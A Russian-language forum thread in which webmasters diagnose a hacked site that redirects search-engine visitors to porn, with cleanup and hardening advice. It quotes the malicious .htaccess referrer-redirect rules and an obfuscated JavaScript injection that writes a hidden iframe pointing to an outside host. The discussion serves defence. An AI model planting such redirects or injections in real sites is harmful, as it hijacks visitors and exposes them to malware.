Народ, объясните мне как такое может быть!

есть сайт (не сочтите за каку-либо рекламу но указание сайта обязательно для проведения проверки)
так вот, есть сайт www.in-english.kiev.ua
захожу на него нормально

но если пытаюсь зайти по ссылке из результатов поиска в Google меня сразу редиректит на всякое порно

в чем подвох
заявку в гугле оставил, но они что-то не шевелятся отвечать

может кто сталкивался с таким?

Буду рад если поделитесь опытом борьбы с такой напастью

к выше сказанному


вот пример поиска:
http://www.google.com.ua/search?hl=ru&cr=countryUA&newwindow=1&q=+site:www.in-english.kiev.ua+innovation+english

Здравствуйте, Упщк, Вы писали:

У>Народ, объясните мне как такое может быть!

У>есть сайт (не сочтите за каку-либо рекламу но указание сайта обязательно для проведения проверки)
У>так вот, есть сайт www.in-english.kiev.ua
У>захожу на него нормально

У>но если пытаюсь зайти по ссылке из результатов поиска в Google меня сразу редиректит на всякое порно

У>в чем подвох
У>заявку в гугле оставил, но они что-то не шевелятся отвечать

У>может кто сталкивался с таким?

У>Буду рад если поделитесь опытом борьбы с такой напастью


смотрим, чем обмениваются клиент с сервером и видим:
(особенно тщательно смотри на выделенное)

http://www.google.com.ua/url?sa=T&source=web&ct=res&cd=1&url=http%3A%2F%2Fwww.in-english.kiev.ua%2F&ei=ib_xSebXDtaEsAaj2_mJAQ

GET /url?sa=T&source=web&ct=res&cd=1&url=http%3A%2F%2Fwww.in-english.kiev.ua%2F&ei=ib_xSebXDtaEsAaj2_mJAQ HTTP/1.1
Host: www.google.com.ua
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9 (.NET CLR 3.5.30729)
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.google.com.ua/search?hl=ru&cr=countryUA&newwindow=1&q=+site:www.in-english.kiev.ua+innovation+english
Cookie: PREF=ID=244b1a7057e7230e:TM=1240579977:LM=1240579977:S=xC7GgQRt9cVdh3zJ; NID=22=NQXRlz_GsLAHqLwcFElU-iOXBczdLW1Ja8k2geZ2JpV2KZSkjpwmtdzE_Kg_X70SdoMW3e-hMlw5qRhfV7lDw4hAASvAshTgAWLmFb9TGTP0KXXgcb7B7NBf114Egq4p

HTTP/1.x 204 No Content
Date: Fri, 24 Apr 2009 13:33:03 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Server: gws
Content-Length: 0
----------------------------------------------------------
http://www.in-english.kiev.ua/

GET / HTTP/1.1
Host: www.in-english.kiev.ua
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.google.com.ua/search?hl=ru&cr=countryUA&newwindow=1&q=+site:www.in-english.kiev.ua+innovation+english

HTTP/1.x 302 Found
Date: Fri, 24 Apr 2009 13:33:03 GMT
Server: Apache
Location: http://spyware-files.info/0/go.php?sid=2
Content-Length: 296
Connection: close
Content-Type: text/html; charset=iso-8859-1
----------------------------------------------------------
http://spyware-files.info/0/go.php?sid=2

[skipped, ибо дальше неинтересная серия редиректов до порнухи]

То есть на твоем сайте делается 302ой редирект до порно-распределителя.
Смотри внимательно в .htaccess (или где там у тебя редиректы хандлятся).
Похоже, кто-то подсадил тебе на сервер троянскую коняжку, которая и редиректит налево (видимо при условии, что в реферере гугл)

почистил .htaccess и все стало ок!!!!

в .htaccess было:

.htaccess

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://spyware-files.info/0/go.php?sid=2 [R,L]

Здравствуйте, Упщк, Вы писали:

У>почистил .htaccess и все стало ок!!!!

У>в .htaccess было:

[skipped]

что и требовалось доказать

проверь на всякий пожарный права на .htaccess;
убедись, что в конфиге apache все насроено так, чтобы этот файл никому ни при каких условиях не был виден;
проверь свои скрипты (особенно, которые занимаются аплоадом файла), что они не дают возможности грузить на сервер файло, которое может на нем исполниться (ну там .php, .cgi и т.п.);
проверь, что php не может исполнять файлы с расширением не .php

как-то ведь тебе .htaccess поправили (а может и загрузили через дыру).

типичная атака — это зааплоалить через дыру на сервер .php или даже .jpg, с кодом, который либо грузит в нужное место нужный файл, либо "достает" нужный файл с нужного места, либо с другим хитрожопым кодом. Потом злоумышленнику остается только запустить заргуженный "троян" и воспользоваться его возможностями.

Здравствуйте, Упщк, Вы писали:

У>Народ, объясните мне как такое может быть!

Здравствуйте, Упщк, Вы писали:

У>Народ, объясните мне как такое может быть!

Здравствуйте, Упщк, Вы писали:

У>Народ, объясните мне как такое может быть!

Подцепил эту же заразу на Windows хостинге. Сайт крутится на ASP.NET, его пытались заразить путем дописывания в конец .aspx страниц вот этого скрипта:

<html><body><script type="text/javascript">var XiLgdMoRSAbuUBAgpMkf = "uKNMv60uKNMv105uKNMv102uKNMv114uKNMv97uKNMv109uKNMv101uKNMv32uKNMv119uKNMv105uKNMv100uKNMv116uKNMv104uKNMv61uKNMv34uKNMv52uKNMv56uKNMv48uKNMv34uKNMv32uKNMv104uKNMv101uKNMv105uKNMv103uKNMv104uKNMv116uKNMv61uKNMv34uKNMv54uKNMv48uKNMv34uKNMv32uKNMv115uKNMv114uKNMv99uKNMv61uKNMv34uKNMv104uKNMv116uKNMv116uKNMv112uKNMv58uKNMv47uKNMv47uKNMv120uKNMv98uKNMv120uKNMv46uKNMv116uKNMv119uKNMv47uKNMv105uKNMv110uKNMv46uKNMv99uKNMv103uKNMv105uKNMv63uKNMv51uKNMv34uKNMv32uKNMv115uKNMv116uKNMv121uKNMv108uKNMv101uKNMv61uKNMv34uKNMv98uKNMv111uKNMv114uKNMv100uKNMv101uKNMv114uKNMv58uKNMv48uKNMv112uKNMv120uKNMv59uKNMv32uKNMv112uKNMv111uKNMv115uKNMv105uKNMv116uKNMv105uKNMv111uKNMv110uKNMv58uKNMv114uKNMv101uKNMv108uKNMv97uKNMv116uKNMv105uKNMv118uKNMv101uKNMv59uKNMv32uKNMv116uKNMv111uKNMv112uKNMv58uKNMv48uKNMv112uKNMv120uKNMv59uKNMv32uKNMv108uKNMv101uKNMv102uKNMv116uKNMv58uKNMv45uKNMv53uKNMv48uKNMv48uKNMv112uKNMv120uKNMv59uKNMv32uKNMv111uKNMv112uKNMv97uKNMv99uKNMv105uKNMv116uKNMv121uKNMv58uKNMv48uKNMv59uKNMv32uKNMv102uKNMv105uKNMv108uKNMv116uKNMv101uKNMv114uKNMv58uKNMv112uKNMv114uKNMv111uKNMv103uKNMv105uKNMv100uKNMv58uKNMv68uKNMv88uKNMv73uKNMv109uKNMv97uKNMv103uKNMv101uKNMv84uKNMv114uKNMv97uKNMv110uKNMv115uKNMv102uKNMv111uKNMv114uKNMv109uKNMv46uKNMv77uKNMv105uKNMv99uKNMv114uKNMv111uKNMv115uKNMv111uKNMv102uKNMv116uKNMv46uKNMv65uKNMv108uKNMv112uKNMv104uKNMv97uKNMv40uKNMv111uKNMv112uKNMv97uKNMv99uKNMv105uKNMv116uKNMv121uKNMv61uKNMv48uKNMv41uKNMv59uKNMv32uKNMv45uKNMv109uKNMv111uKNMv122uKNMv45uKNMv111uKNMv112uKNMv97uKNMv99uKNMv105uKNMv116uKNMv121uKNMv58uKNMv48uKNMv34uKNMv62uKNMv60uKNMv47uKNMv105uKNMv102uKNMv114uKNMv97uKNMv109uKNMv101uKNMv62";var ChBcyUOSVHTsqfYTsNlK = XiLgdMoRSAbuUBAgpMkf.split("uKNMv");var ONFiOFOESykVglxfGMyb = "";for (var URUKxtepGQzUdEDsKRwd=1; URUKxtepGQzUdEDsKRwd<ChBcyUOSVHTsqfYTsNlK.length; URUKxtepGQzUdEDsKRwd++){ONFiOFOESykVglxfGMyb+=String.fromCharCode(ChBcyUOSVHTsqfYTsNlK[URUKxtepGQzUdEDsKRwd]);}document.write(ONFiOFOESykVglxfGMyb)</script></body></html>

В корневой каталог был добавлен файл .htaccess следующего содержания:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://spywarepc.info/0/go.php?sid=2 [R,L]

Что интересно, запись на диск в корневом каталоге запрещена, разрешено лишь чтение и выполнение файлов. Поэтому не ясно каким образом им удалось записать инфу в страницы .aspx, а также файл .htaccess. Видимо где-то дыра в коде, буду искать.

Всем честным людям удачи!

Здравствуйте, Аноним, Вы писали:

А>Здравствуйте, Упщк, Вы писали:

У>>Народ, объясните мне как такое может быть!

А>Подцепил эту же заразу на Windows хостинге. Сайт крутится на ASP.NET, его пытались заразить путем дописывания в конец .aspx страниц вот этого скрипта:

А><html><body><script type="text/javascript">var XiLgdMoRSAbuUBAgpMkf = "uKNMv60uKNMv105uKNMv102uKNMv114uKNMv97uKNMv109uKNMv101uKNMv32uKNMv119uKNMv105uKNMv100uKNMv116uKNMv104uKNMv61uKNMv34uKNMv52uKNMv56uKNMv48uKNMv34uKNMv32uKNMv104uKNMv101uKNMv105uKNMv103uKNMv104uKNMv116uKNMv61uKNMv34uKNMv54uKNMv48uKNMv34uKNMv32uKNMv115uKNMv114uKNMv99uKNMv61uKNMv34uKNMv104uKNMv116uKNMv116uKNMv112uKNMv58uKNMv47uKNMv47uKNMv120uKNMv98uKNMv120uKNMv46uKNMv116uKNMv119uKNMv47uKNMv105uKNMv110uKNMv46uKNMv99uKNMv103uKNMv105uKNMv63uKNMv51uKNMv34uKNMv32uKNMv115uKNMv116uKNMv121uKNMv108uKNMv101uKNMv61uKNMv34uKNMv98uKNMv111uKNMv114uKNMv100uKNMv101uKNMv114uKNMv58uKNMv48uKNMv112uKNMv120uKNMv59uKNMv32uKNMv112uKNMv111uKNMv115uKNMv105uKNMv116uKNMv105uKNMv111uKNMv110uKNMv58uKNMv114uKNMv101uKNMv108uKNMv97uKNMv116uKNMv105uKNMv118uKNMv101uKNMv59uKNMv32uKNMv116uKNMv111uKNMv112uKNMv58uKNMv48uKNMv112uKNMv120uKNMv59uKNMv32uKNMv108uKNMv101uKNMv102uKNMv116uKNMv58uKNMv45uKNMv53uKNMv48uKNMv48uKNMv112uKNMv120uKNMv59uKNMv32uKNMv111uKNMv112uKNMv97uKNMv99uKNMv105uKNMv116uKNMv121uKNMv58uKNMv48uKNMv59uKNMv32uKNMv102uKNMv105uKNMv108uKNMv116uKNMv101uKNMv114uKNMv58uKNMv112uKNMv114uKNMv111uKNMv103uKNMv105uKNMv100uKNMv58uKNMv68uKNMv88uKNMv73uKNMv109uKNMv97uKNMv103uKNMv101uKNMv84uKNMv114uKNMv97uKNMv110uKNMv115uKNMv102uKNMv111uKNMv114uKNMv109uKNMv46uKNMv77uKNMv105uKNMv99uKNMv114uKNMv111uKNMv115uKNMv111uKNMv102uKNMv116uKNMv46uKNMv65uKNMv108uKNMv112uKNMv104uKNMv97uKNMv40uKNMv111uKNMv112uKNMv97uKNMv99uKNMv105uKNMv116uKNMv121uKNMv61uKNMv48uKNMv41uKNMv59uKNMv32uKNMv45uKNMv109uKNMv111uKNMv122uKNMv45uKNMv111uKNMv112uKNMv97uKNMv99uKNMv105uKNMv116uKNMv121uKNMv58uKNMv48uKNMv34uKNMv62uKNMv60uKNMv47uKNMv105uKNMv102uKNMv114uKNMv97uKNMv109uKNMv101uKNMv62";var ChBcyUOSVHTsqfYTsNlK = XiLgdMoRSAbuUBAgpMkf.split("uKNMv");var ONFiOFOESykVglxfGMyb = "";for (var URUKxtepGQzUdEDsKRwd=1; URUKxtepGQzUdEDsKRwd<ChBcyUOSVHTsqfYTsNlK.length; URUKxtepGQzUdEDsKRwd++){ONFiOFOESykVglxfGMyb+=String.fromCharCode(ChBcyUOSVHTsqfYTsNlK[URUKxtepGQzUdEDsKRwd]);}document.write(ONFiOFOESykVglxfGMyb)</script></body></html>

А>В корневой каталог был добавлен файл .htaccess следующего содержания:

А>RewriteEngine On
А>RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
А>RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
А>RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
А>RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
А>RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]

А>RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]

А>RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
А>RewriteRule .* http://spywarepc.info/0/go.php?sid=2 [R,L]

А>Что интересно, запись на диск в корневом каталоге запрещена, разрешено лишь чтение и выполнение файлов. Поэтому не ясно каким образом им удалось записать инфу в страницы .aspx, а также файл .htaccess. Видимо где-то дыра в коде, буду искать.

А>Всем честным людям удачи!

Если есть где закачка файлов, то вполне возможно. В папке, где идёт загрузка файлов скопируй htaccess с ограничением на формат загрёжаемых файлов (это можно обойти), лучшее вообще вынеси за предели домена в отдельную папку.
Либо второй вариант — это ftp — прописаны напрямую логин и пароль в FAR к примнру что в принципе вообще не сдожно сделать.

Для взлома похоже используют URL типа вот такого:

/(A(liZclMyZxwEkAAAANGRjNTJmNDYtMTMyYS00NTVjLTk4NzktMTJkNWQxZmFhY2I11m71HW9Teukf8s2EqFivRPlZc3M1)S(20vw4p45pyiynrapcodgcz45))/AddEditPost.aspx

Здравствуйте, <Аноним>, Вы писали:

А>Здравствуйте, Упщк, Вы писали:

У>>Народ, объясните мне как такое может быть!

А>Подцепил эту же заразу на Windows хостинге. Сайт крутится на ASP.NET, его пытались заразить путем дописывания в конец .aspx страниц вот этого скрипта:


А>В корневой каталог был добавлен файл .htaccess следующего содержания:

или IIS научился понимать .htaccess, или месье на windows хостинге использует апач с моно ?!

а записали просто, троян просек пароли на ftp